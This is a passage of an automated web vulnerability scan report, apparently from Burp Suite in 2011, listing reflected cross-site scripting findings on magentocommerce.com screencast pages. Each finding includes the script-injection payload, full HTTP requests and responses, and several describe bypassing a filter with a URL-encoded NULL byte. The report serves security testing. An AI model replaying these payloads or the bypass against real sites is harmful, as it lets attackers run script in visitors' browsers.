Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:24 GMT
Content-Length: 33316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/adding-related-products/view?%002f335"><script>alert(1)</script>878d14e3ada=1">
...[SNIP]...

1.5. http://www.magentocommerce.com/media/screencasts/community-groups/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b28a6"><script>alert(1)</script>1f29963ffb4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/community-groupsb28a6"><script>alert(1)</script>1f29963ffb4/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176258; expires=Sat, 11-Aug-2012 15:10:58 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:59 GMT
Content-Length: 33499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/community-groupsb28a6"><script>alert(1)</script>1f29963ffb4/view">
...[SNIP]...

1.6. http://www.magentocommerce.com/media/screencasts/community-groups/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c9b19"><script>alert(1)</script>7b124583d27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9b19"><script>alert(1)</script>7b124583d27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/community-groups/view?%00c9b19"><script>alert(1)</script>7b124583d27=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176142; expires=Sat, 11-Aug-2012 15:09:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:03 GMT
Content-Length: 33324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/community-groups/view?%00c9b19"><script>alert(1)</script>7b124583d27=1">
...[SNIP]...

1.7. http://www.magentocommerce.com/media/screencasts/configurable-products/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b771"><script>alert(1)</script>18575fd053 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/configurable-products7b771"><script>alert(1)</script>18575fd053/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176335; expires=Sat, 11-Aug-2012 15:12:15 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:15 GMT
Content-Length: 33503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configurable-products7b771"><script>alert(1)</script>18575fd053/view">
...[SNIP]...

1.8. http://www.magentocommerce.com/media/screencasts/configurable-products/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006cebb"><script>alert(1)</script>57e160a161a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6cebb"><script>alert(1)</script>57e160a161a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/configurable-products/view?%006cebb"><script>alert(1)</script>57e160a161a=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176205; expires=Sat, 11-Aug-2012 15:10:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:05 GMT
Content-Length: 35307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configurable-products/view?%006cebb"><script>alert(1)</script>57e160a161a=1">
...[SNIP]...

1.9. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93130"><script>alert(1)</script>0ed12d6b331 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/configuring-tier-pricing93130"><script>alert(1)</script>0ed12d6b331/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176299; expires=Sat, 11-Aug-2012 15:11:39 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:40 GMT
Content-Length: 33507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing93130"><script>alert(1)</script>0ed12d6b331/view">
...[SNIP]...

1.10. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a8382"><script>alert(1)</script>ed448912710 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8382"><script>alert(1)</script>ed448912710 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/configuring-tier-pricing/view?%00a8382"><script>alert(1)</script>ed448912710=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176244; expires=Sat, 11-Aug-2012 15:10:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Fscreencasts%2Fconfiguring-tier-pricing%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:45 GMT
Content-Length: 34980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view?%00a8382"><script>alert(1)</script>ed448912710=1">
...[SNIP]...

1.11. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a63b5"><script>alert(1)</script>03d6ebc65f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/content-staging-and-merginga63b5"><script>alert(1)</script>03d6ebc65f7/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176212; expires=Sat, 11-Aug-2012 15:10:12 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:12 GMT
Content-Length: 33510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/content-staging-and-merginga63b5"><script>alert(1)</script>03d6ebc65f7/view">
...[SNIP]...

1.12. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e6627"><script>alert(1)</script>315df2cd626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e6627"><script>alert(1)</script>315df2cd626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/content-staging-and-merging/view?%00e6627"><script>alert(1)</script>315df2cd626=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176146; expires=Sat, 11-Aug-2012 15:09:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fmedia%2Fscreencasts%2Fcontent-staging-and-merging%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:06 GMT
Content-Length: 33338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view?%00e6627"><script>alert(1)</script>315df2cd626=1">
...[SNIP]...

1.13. http://www.magentocommerce.com/media/screencasts/currency/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4254"><script>alert(1)</script>d10612e3d58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/currencye4254"><script>alert(1)</script>d10612e3d58/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176217; expires=Sat, 11-Aug-2012 15:10:17 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:17 GMT
Content-Length: 33491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/currencye4254"><script>alert(1)</script>d10612e3d58/view">
...[SNIP]...

1.14. http://www.magentocommerce.com/media/screencasts/currency/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002e247"><script>alert(1)</script>4e616fa203b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e247"><script>alert(1)</script>4e616fa203b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/currency/view?%002e247"><script>alert(1)</script>4e616fa203b=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176142; expires=Sat, 11-Aug-2012 15:09:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Fscreencasts%2Fcurrency%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:02 GMT
Content-Length: 34921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/currency/view?%002e247"><script>alert(1)</script>4e616fa203b=1">
...[SNIP]...

1.15. http://www.magentocommerce.com/media/screencasts/data-exporting/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7228e"><script>alert(1)</script>5efecb7ffae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/data-exporting7228e"><script>alert(1)</script>5efecb7ffae/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176231; expires=Sat, 11-Aug-2012 15:10:31 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:32 GMT
Content-Length: 33497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/data-exporting7228e"><script>alert(1)</script>5efecb7ffae/view">
...[SNIP]...

1.16. http://www.magentocommerce.com/media/screencasts/data-exporting/view [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b23ed"><script>alert(1)</script>58665ad958a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b23ed"><script>alert(1)</script>58665ad958a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/data-exporting/view?%00b23ed"><script>alert(1)</script>58665ad958a=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176144; expires=Sat, 11-Aug-2012 15:09:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Fscreencasts%2Fdata-exporting%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:05 GMT
Content-Length: 34694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/data-exporting/view?%00b23ed"><script>alert(1)</script>58665ad958a=1">
...[SNIP]...

1.17. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ebd"><script>alert(1)</script>0b0eb7b22d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/designers-guide-1f4ebd"><script>alert(1)</script>0b0eb7b22d1/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176226; expires=Sat, 11-Aug-2012 15:10:26 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:27 GMT
Content-Length: 33500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/designers-guide-1f4ebd"><script>alert(1)</script>0b0eb7b22d1/view">
...[SNIP]...

